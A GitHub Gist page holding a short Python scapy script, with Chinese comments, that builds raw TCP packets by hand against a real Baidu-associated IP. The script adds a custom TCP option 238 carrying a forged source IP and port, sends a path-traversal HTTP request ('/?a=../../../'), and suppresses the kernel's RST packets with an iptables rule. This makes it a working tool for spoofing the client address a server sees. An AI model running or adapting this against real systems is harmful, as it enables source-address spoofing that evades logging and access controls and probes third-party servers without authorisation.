Last active
August 17, 2021 02:53
-
-
Save leveryd/03bc78c6d6badaa5a80eddf684bccf0e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coding:utf-8 | |
| """ | |
| 1. 安装依赖 | |
| pip3 install scapy | |
| 2. 修改TCPOptions数据结构,增加options类型 | |
| 文件位置大概在 /usr/local/lib/python3.6/site-packages/scapy/layers/inet.py | |
| TCPOptions = ( | |
| {0: ("EOL", None), | |
| ... | |
| 238: ("Experiment", "!HHH"), # 添加此行,opcode是238 | |
| }, | |
| {"EOL": 0, | |
| ... | |
| "Experiment": 238, # 添加此行,opcode是238 | |
| }) | |
| 3. 禁止操作系统发rst包 | |
| iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 120.92.15.189 -j DROP | |
| """ | |
| try: | |
| from scapy.all import * | |
| except Exception as e: | |
| from scapy import * | |
| host = "a.baidu.com" | |
| ip = "120.92.15.189" | |
| sport = 12000 | |
| dport = 80 | |
| options = (0xcafe, 0x94C1, 0x6441) # 伪造的ip和端口 | |
| uri = "/?a=../../../" | |
| iface = "eth0" | |
| # 客户端发送tcp握手时的syn包 | |
| syn = IP(dst=ip) / TCP(dport=dport, sport=sport, flags='S', options=[('Experiment', options), ('NOP', 0), ('NOP', 0)]) | |
| syn_ack = sr1(syn) | |
| # 客户端发送tcp握手时的ack包。这里将ack包和发送数据的syn-ack包合并成一个包,也能正常通信。 | |
| getStr = 'GET %s HTTP/1.1\r\nHost: %s\r\n\r\n' % (uri, host) | |
| request = IP(dst=ip) / TCP(dport=dport, sport=sport, | |
| seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq + 1, flags='A', options=[('Experiment', options), ('NOP', 0), ('NOP', 0)]) / getStr | |
| send(request, iface=iface) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment